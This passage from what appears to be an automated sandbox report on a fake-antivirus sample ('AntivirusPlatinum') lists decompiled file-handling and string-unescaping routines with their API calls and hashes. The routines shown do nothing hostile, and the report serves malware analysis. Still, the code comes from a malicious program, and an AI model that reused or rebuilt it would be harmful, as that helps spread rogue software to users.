                                                                                                                                                  							_t77 = E0040568A( &_v4144, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                  							_t104 = 0;
                                                                                                                                                  							 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                  							if(_t77 > 0) {
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_t79 =  *_t125;
                                                                                                                                                  									_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                  									_t95 = _t95 + 1;
                                                                                                                                                  									if(_t111 == 0) {
                                                                                                                                                  										goto L41;
                                                                                                                                                  									}
                                                                                                                                                  									if(_t111 != 0x5c) {
                                                                                                                                                  										if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                  											_t111 = 0xc;
                                                                                                                                                  										}
                                                                                                                                                  										goto L39;
                                                                                                                                                  									} else {
                                                                                                                                                  										_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                  										if(_t116 == 0) {
                                                                                                                                                  											 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                  											goto L35;
                                                                                                                                                  										} else {
                                                                                                                                                  											_t117 = _t116 - 0x3a;
                                                                                                                                                  											if(_t117 == 0) {
                                                                                                                                                  												 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                  												goto L35;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t118 = _t117 - 0x12;
                                                                                                                                                  												if(_t118 == 0) {
                                                                                                                                                  													 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                  													goto L35;
                                                                                                                                                  												} else {
                                                                                                                                                  													_t119 = _t118 - 4;
                                                                                                                                                  													if(_t119 == 0) {
                                                                                                                                                  														 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                  														goto L35;
                                                                                                                                                  													} else {
                                                                                                                                                  														if(_t119 != 0) {
                                                                                                                                                  															L39:
                                                                                                                                                  															 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                  														} else {
                                                                                                                                                  															 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                  															L35:
                                                                                                                                                  															_t95 = _t95 + 1;
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									_t104 = _t104 + 1;
                                                                                                                                                  									if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                  										continue;
                                                                                                                                                  									}
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							L41:
                                                                                                                                                  							 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                  							 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                  						}
                                                                                                                                                  						goto L42;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t76 = E00405074(_t95,  &_v4144);
                                                                                                                                                  					}
                                                                                                                                                  					L43:
                                                                                                                                                  				} else {
                                                                                                                                                  					GetModuleFileNameA(0,  &_v1040, 0x400);
                                                                                                                                                  					_t76 = E0040A3D9(_t97,  &_v1040, 0x5c);
                                                                                                                                                  					if(_t76 != 0) {
                                                                                                                                                  						_t66 = _t76 + 1;
                                                                                                                                                  						goto L4;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t76;
                                                                                                                                                  			}




























                                                                                                                                                  0x00409293
                                                                                                                                                  0x00409293
                                                                                                                                                  0x00409293
                                                                                                                                                  0x0040929b
                                                                                                                                                  0x0040929f
                                                                                                                                                  0x004092a3
                                                                                                                                                  0x004092a6
                                                                                                                                                  0x004092a8
                                                                                                                                                  0x004092af
                                                                                                                                                  0x004092b5
                                                                                                                                                  0x004092dc
                                                                                                                                                  0x004092e0
                                                                                                                                                  0x004092ec
                                                                                                                                                  0x00409304
                                                                                                                                                  0x0040930b
                                                                                                                                                  0x0040931d
                                                                                                                                                  0x00409321
                                                                                                                                                  0x00409324
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409325
                                                                                                                                                  0x00409335
                                                                                                                                                  0x0040933a
                                                                                                                                                  0x0040934f
                                                                                                                                                  0x00409354
                                                                                                                                                  0x0040935a
                                                                                                                                                  0x00409360
                                                                                                                                                  0x00409362
                                                                                                                                                  0x00409362
                                                                                                                                                  0x0040936c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409393
                                                                                                                                                  0x004093be
                                                                                                                                                  0x004093c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093c6
                                                                                                                                                  0x004093d0
                                                                                                                                                  0x004093e5
                                                                                                                                                  0x004093ea
                                                                                                                                                  0x004093f1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093f7
                                                                                                                                                  0x004093fb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093fb
                                                                                                                                                  0x004093f1
                                                                                                                                                  0x004093c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409393
                                                                                                                                                  0x004093cd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093cd
                                                                                                                                                  0x004094bd
                                                                                                                                                  0x004094c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004094c8
                                                                                                                                                  0x00409401
                                                                                                                                                  0x00409404
                                                                                                                                                  0x00409405
                                                                                                                                                  0x00409410
                                                                                                                                                  0x00409417
                                                                                                                                                  0x00409425
                                                                                                                                                  0x0040942a
                                                                                                                                                  0x0040942e
                                                                                                                                                  0x00409437
                                                                                                                                                  0x00409445
                                                                                                                                                  0x0040944a
                                                                                                                                                  0x0040944e
                                                                                                                                                  0x00409451
                                                                                                                                                  0x00409453
                                                                                                                                                  0x00409453
                                                                                                                                                  0x00409455
                                                                                                                                                  0x00409459
                                                                                                                                                  0x0040945c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409461
                                                                                                                                                  0x004094a1
                                                                                                                                                  0x004094aa
                                                                                                                                                  0x004094aa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409463
                                                                                                                                                  0x00409467
                                                                                                                                                  0x0040946a
                                                                                                                                                  0x00409497
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040946c
                                                                                                                                                  0x0040946c
                                                                                                                                                  0x0040946f
                                                                                                                                                  0x00409491
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409471
                                                                                                                                                  0x00409471
                                                                                                                                                  0x00409474
                                                                                                                                                  0x0040948b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409476
                                                                                                                                                  0x00409476
                                                                                                                                                  0x00409479
                                                                                                                                                  0x00409485
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040947b
                                                                                                                                                  0x0040947d
                                                                                                                                                  0x004094ab
                                                                                                                                                  0x004094ab
                                                                                                                                                  0x0040947f
                                                                                                                                                  0x0040947f
                                                                                                                                                  0x0040949b
                                                                                                                                                  0x0040949b
                                                                                                                                                  0x0040949b
                                                                                                                                                  0x0040947d
                                                                                                                                                  0x00409479
                                                                                                                                                  0x00409474
                                                                                                                                                  0x0040946f
                                                                                                                                                  0x0040946a
                                                                                                                                                  0x004094ae
                                                                                                                                                  0x004094b2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004094b2
                                                                                                                                                  0x00409453
                                                                                                                                                  0x004094b4
                                                                                                                                                  0x004094b6
                                                                                                                                                  0x004094ba
                                                                                                                                                  0x004094ba
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040930d
                                                                                                                                                  0x00409313
                                                                                                                                                  0x00409313
                                                                                                                                                  0x004094c9
                                                                                                                                                  0x004092b7
                                                                                                                                                  0x004092bf
                                                                                                                                                  0x004092ce
                                                                                                                                                  0x004092d5
                                                                                                                                                  0x004092db
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004092db
                                                                                                                                                  0x004092d5
                                                                                                                                                  0x004094cc

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098EC,?,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D3F9,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 004092BF
                                                                                                                                                    • Part of subcall function 00404FDC: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7FA,?,?,0040555D,?,?), ref: 00404FF3
                                                                                                                                                    • Part of subcall function 00404FDC: GetLastError.KERNEL32(?,0040A7FA,?,?,0040555D,?,?), ref: 00405000
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$ErrorLastModuleNamePointer
                                                                                                                                                  • String ID: *messages***$@$a
                                                                                                                                                  • API String ID: 1624790276-2848287086
                                                                                                                                                  • Opcode ID: 6095de22ffa8cc4042a1b9701838ad665518839f05c264bbbc2cc301cf85d679
                                                                                                                                                  • Instruction ID: 84dcd20e4f7640fa0209f036967ba761b6bafe31550b0c330afd5de3d59fc2c4
                                                                                                                                                  • Opcode Fuzzy Hash: 6095de22ffa8cc4042a1b9701838ad665518839f05c264bbbc2cc301cf85d679
                                                                                                                                                  • Instruction Fuzzy Hash: 7C61F371904244EEEB31DB24CC84BAF3BA49B45314F1085BFE956B62D3CA788E46CB19
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                  			E00405097(void* __ecx, CHAR* _a4, WCHAR* _a8, char _a12, char _a15, long _a16) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _t41;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  				WCHAR* _t51;
                                                                                                                                                  				long _t58;
                                                                                                                                                  				void* _t59;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  
                                                                                                                                                  				_t55 = __ecx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t62 = __ecx;
                                                                                                                                                  				 *((intOrPtr*)(__ecx + 0xc18)) = 0;
                                                                                                                                                  				if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                  					_a12 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				_v8 = 0x80000000;
                                                                                                                                                  				if(_a16 != 0) {
                                                                                                                                                  					_v8 = 0xc0000000;
                                                                                                                                                  				}
                                                                                                                                                  				_a16 = 1;
                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                  					_a16 = 3;
                                                                                                                                                  				}
                                                                                                                                                  				_t58 = (0 |  *((intOrPtr*)(_t62 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
                                                                                                                                                  				if(E00406EA5() == 0) {
                                                                                                                                                  					L10:
                                                                                                                                                  					_t41 = CreateFileA(_a4, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t51 = _a8;
                                                                                                                                                  					if(_t51 == 0 ||  *_t51 == 0) {
                                                                                                                                                  						goto L10;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t41 = CreateFileW(_t51, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t59 = _t41;
                                                                                                                                                  				if(_t59 == 0xffffffff && GetLastError() == 2) {
                                                                                                                                                  					 *((intOrPtr*)(_t62 + 0xc18)) = 1;
                                                                                                                                                  				}
                                                                                                                                                  				_a15 = _t59 != 0xffffffff;
                                                                                                                                                  				 *((char*)(_t62 + 0x12)) = 0;
                                                                                                                                                  				 *((intOrPtr*)(_t62 + 0xc)) = 0;
                                                                                                                                                  				 *((char*)(_t62 + 0x10)) = 0;
                                                                                                                                                  				if(_a15 != 0) {
                                                                                                                                                  					 *(_t62 + 4) = _t59;
                                                                                                                                                  					if(_a8 == 0) {
                                                                                                                                                  						 *((short*)(_t62 + 0x418)) = 0;
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040E338(_t62 + 0x418, _a8);
                                                                                                                                                  					}
                                                                                                                                                  					_t44 = _t62 + 0x17;
                                                                                                                                                  					if(_a4 == 0) {
                                                                                                                                                  						E0040E115(_t55, _a8, _t44, 0x1000000);
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040A477(_t44, _a4);
                                                                                                                                                  					}
                                                                                                                                                  					E00404F07(_t62,  *(_t62 + 4));
                                                                                                                                                  				}
                                                                                                                                                  				return _a15;
                                                                                                                                                  			}










                                                                                                                                                  0x00405097
                                                                                                                                                  0x0040509a
                                                                                                                                                  0x0040509d
                                                                                                                                                  0x004050a2
                                                                                                                                                  0x004050ab
                                                                                                                                                  0x004050ad
                                                                                                                                                  0x004050ad
                                                                                                                                                  0x004050b1
                                                                                                                                                  0x004050bb
                                                                                                                                                  0x004050bd
                                                                                                                                                  0x004050bd
                                                                                                                                                  0x004050c4
                                                                                                                                                  0x004050ce
                                                                                                                                                  0x004050d0
                                                                                                                                                  0x004050d0
                                                                                                                                                  0x004050e5
                                                                                                                                                  0x004050ee
                                                                                                                                                  0x00405110
                                                                                                                                                  0x0040511e
                                                                                                                                                  0x004050f0
                                                                                                                                                  0x004050f0
                                                                                                                                                  0x004050f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004050fc
                                                                                                                                                  0x00405108
                                                                                                                                                  0x00405108
                                                                                                                                                  0x004050f5
                                                                                                                                                  0x00405124
                                                                                                                                                  0x00405129
                                                                                                                                                  0x00405136
                                                                                                                                                  0x00405136
                                                                                                                                                  0x00405143
                                                                                                                                                  0x00405147
                                                                                                                                                  0x0040514a
                                                                                                                                                  0x0040514d
                                                                                                                                                  0x00405153
                                                                                                                                                  0x00405155
                                                                                                                                                  0x0040515b
                                                                                                                                                  0x00405170
                                                                                                                                                  0x0040515d
                                                                                                                                                  0x00405167
                                                                                                                                                  0x00405167
                                                                                                                                                  0x00405177
                                                                                                                                                  0x0040517d
                                                                                                                                                  0x00405193
                                                                                                                                                  0x0040517f
                                                                                                                                                  0x00405183
                                                                                                                                                  0x00405183
                                                                                                                                                  0x0040519d
                                                                                                                                                  0x0040519d
                                                                                                                                                  0x004051a9

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,00409309,?,00000000,00000001), ref: 00405108
                                                                                                                                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,00409309,?,00000000,00000001), ref: 0040511E
                                                                                                                                                    • Part of subcall function 0040E115: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,00405198,?,?,01000000,?), ref: 0040E12F
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,00409309,?,00000000,00000001,00000000,00000000,?,?,?,0000005C,00414C88), ref: 0040512B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile$ByteCharErrorLastMultiWide
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 158210224-3595611156
                                                                                                                                                  • Opcode ID: 1b80a3972cda857646efe7b82b324378e3a3be6fb2e88d9081803b5179a2740f
                                                                                                                                                  • Instruction ID: 427e4f42cfb4fe8a4b8f94c3947b3ca18014e29d0b63896657673fbab71910d3
                                                                                                                                                  • Opcode Fuzzy Hash: 1b80a3972cda857646efe7b82b324378e3a3be6fb2e88d9081803b5179a2740f
                                                                                                                                                  • Instruction Fuzzy Hash: 2031F071800788AFDB218F60C844BDF3BA9EB41314F14456EF951AB281C3799E949BA9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E004052D2(void* __ecx, void* _a4, long _a8) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				int _t14;
                                                                                                                                                  				signed int _t15;
                                                                                                                                                  				long _t16;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t22 = __ecx;
                                                                                                                                                  				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                                                                                                                                                  					if(_a8 > 0x4e20) {
                                                                                                                                                  						_a8 = 0x4e20;
                                                                                                                                                  					}
                                                                                                                                                  					 *(_t22 + 4) = GetStdHandle(0xfffffff6);
                                                                                                                                                  				}
                                                                                                                                                  				_t14 = ReadFile( *(_t22 + 4), _a4, _a8,  &_v8, 0); // executed
                                                                                                                                                  				if(_t14 != 0) {
                                                                                                                                                  					_t15 = _v8;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t16 = E00405051(_t22);
                                                                                                                                                  					if(_t16 == 0 || _a8 <= 0x4e20) {
                                                                                                                                                  						if( *((intOrPtr*)(_t22 + 0xc)) != 1) {
                                                                                                                                                  							L11:
                                                                                                                                                  							_t15 = _t16 | 0xffffffff;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t16 = GetLastError();
                                                                                                                                                  							if(_t16 != 0x6d) {
                                                                                                                                                  								goto L11;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t15 = 0;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t15 = E004052D2(_t22, _a4, 0x4e20);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}








                                                                                                                                                  0x004052d5
                                                                                                                                                  0x004052d8
                                                                                                                                                  0x004052e3
                                                                                                                                                  0x004052e8
                                                                                                                                                  0x004052ea
                                                                                                                                                  0x004052ea
                                                                                                                                                  0x004052f5
                                                                                                                                                  0x004052f5
                                                                                                                                                  0x00405307
                                                                                                                                                  0x0040530f
                                                                                                                                                  0x00405348
                                                                                                                                                  0x00405311
                                                                                                                                                  0x00405313
                                                                                                                                                  0x0040531a
                                                                                                                                                  0x00405332
                                                                                                                                                  0x00405343
                                                                                                                                                  0x00405343
                                                                                                                                                  0x00405334
                                                                                                                                                  0x00405334
                                                                                                                                                  0x0040533d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040533f
                                                                                                                                                  0x0040533f
                                                                                                                                                  0x0040533f
                                                                                                                                                  0x0040533d
                                                                                                                                                  0x00405321
                                                                                                                                                  0x00405327
                                                                                                                                                  0x00405327
                                                                                                                                                  0x0040531a
                                                                                                                                                  0x0040534e

                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,00414C7C,?,?,004056BF,000000FF,?,00000000,?,00000000), ref: 004052EF
                                                                                                                                                  • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,?,00414C7C,?,?,004056BF,000000FF,?,00000000,?,00000000), ref: 00405307
                                                                                                                                                  • GetLastError.KERNEL32(?,004056BF,000000FF,?,00000000,?,00000000), ref: 00405334
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileHandleLastRead
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 1699850967-3595611156
                                                                                                                                                  • Opcode ID: f03b5bc69443adbf993c94e0b4c472282daeb6f114824d5fbcb0b7a7ba7e5156
                                                                                                                                                  • Instruction ID: d972bf192e1d3f9598e18863326a66fe736dca606b714a29153f01d36eea9568
                                                                                                                                                  • Opcode Fuzzy Hash: f03b5bc69443adbf993c94e0b4c472282daeb6f114824d5fbcb0b7a7ba7e5156
                                                                                                                                                  • Instruction Fuzzy Hash: E6015B31500904FBCF209B51C9048AFBB69EB413B4B10823BED29A62D0C7B8D950DF99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E00404FDC(void* __ecx, signed int __edx) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				long _t8;
                                                                                                                                                  				signed int _t11;
                                                                                                                                                  				signed int _t17;
                                                                                                                                                  				long _t20;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  
                                                                                                                                                  				_t17 = __edx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                  				_t23 = __ecx;
                                                                                                                                                  				_t8 = SetFilePointer( *(__ecx + 4), 0,  &_v8, 1); // executed
                                                                                                                                                  				_t20 = _t8;
                                                                                                                                                  				if(_t20 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					asm("cdq");
                                                                                                                                                  					_t11 = E00401030(_v8, _t17, 0, 1) + _t20;
                                                                                                                                                  					asm("adc edx, ecx");
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *((char*)(_t23 + 0x14)) == 0) {
                                                                                                                                                  						_t11 = _t17 | 0xffffffff;
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040336D(0x414c7c, _t23 + 0x17);
                                                                                                                                                  						goto L4;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}









                                                                                                                                                  0x00404fdc
                                                                                                                                                  0x00404fdf
                                                                                                                                                  0x00404fe0
                                                                                                                                                  0x00404fec
                                                                                                                                                  0x00404ff3
                                                                                                                                                  0x00404ff9
                                                                                                                                                  0x00404ffe
                                                                                                                                                  0x0040501e
                                                                                                                                                  0x00405023
                                                                                                                                                  0x0040502f
                                                                                                                                                  0x00405031
                                                                                                                                                  0x0040500a
                                                                                                                                                  0x0040500e
                                                                                                                                                  0x0040503a
                                                                                                                                                  0x00405010
                                                                                                                                                  0x00405019
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405019
                                                                                                                                                  0x0040500e
                                                                                                                                                  0x00405036

                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7FA,?,?,0040555D,?,?), ref: 00404FF3
                                                                                                                                                  • GetLastError.KERNEL32(?,0040A7FA,?,?,0040555D,?,?), ref: 00405000
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                  • String ID: @Mhv$|LA
                                                                                                                                                  • API String ID: 2976181284-3573172535
                                                                                                                                                  • Opcode ID: 6008ec0fcc46e3801aa7134edd199233a4ed08c658005814deddaad1fa34d866
                                                                                                                                                  • Instruction ID: 2e480e1ce5fe1b1d35513c41c649f52fd4b6def30c48a15a8177b9897f1f0cd1
                                                                                                                                                  • Opcode Fuzzy Hash: 6008ec0fcc46e3801aa7134edd199233a4ed08c658005814deddaad1fa34d866
                                                                                                                                                  • Instruction Fuzzy Hash: 4BF0F6727406007BE724A669CD0ABDF36ADDBC1764F14423AB511E22D0DAF89D0096AD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405898(void* __eflags, CHAR* _a4, WCHAR* _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                  				void* _t6;
                                                                                                                                                  				int _t7;
                                                                                                                                                  				long _t8;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				WCHAR* _t14;
                                                                                                                                                  
                                                                                                                                                  				_t6 = E00406EA5();
                                                                                                                                                  				_t14 = _a8;
                                                                                                                                                  				if(_t6 == 0 || _t14 == 0 ||  *_t14 == 0) {
                                                                                                                                                  					_t7 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t7 = CreateDirectoryW(_t14, 0);
                                                                                                                                                  				}
                                                                                                                                                  				if(_t7 == 0) {
                                                                                                                                                  					_t8 = GetLastError();
                                                                                                                                                  					__eflags = _t8 - 2;
                                                                                                                                                  					if(_t8 == 2) {
                                                                                                                                                  						L12:
                                                                                                                                                  						_t9 = 2;
                                                                                                                                                  						return _t9;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t8 - 3;
                                                                                                                                                  					if(_t8 == 3) {
                                                                                                                                                  						goto L12;
                                                                                                                                                  					}
                                                                                                                                                  					return 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t20 = _a12;
                                                                                                                                                  					if(_a12 != 0) {
                                                                                                                                                  						E004057E8(_t20, _a4, _t14, _a16);
                                                                                                                                                  					}
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  			}








                                                                                                                                                  0x0040589c
                                                                                                                                                  0x004058a1
                                                                                                                                                  0x004058a6
                                                                                                                                                  0x004058c2
                                                                                                                                                  0x004058b2
                                                                                                                                                  0x004058b5
                                                                                                                                                  0x004058b5
                                                                                                                                                  0x004058ca
                                                                                                                                                  0x004058e2
                                                                                                                                                  0x004058e8
                                                                                                                                                  0x004058eb
                                                                                                                                                  0x004058f7
                                                                                                                                                  0x004058f9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058f9
                                                                                                                                                  0x004058ed
                                                                                                                                                  0x004058f0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058cc
                                                                                                                                                  0x004058cc
                                                                                                                                                  0x004058d0
                                                                                                                                                  0x004058d9
                                                                                                                                                  0x004058d9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004058de

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000400,00000000,00000000,?,004059B4,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058B5
                                                                                                                                                  • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000,?,004059B4,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058C2
                                                                                                                                                  • GetLastError.KERNEL32(?,004059B4,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058E2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
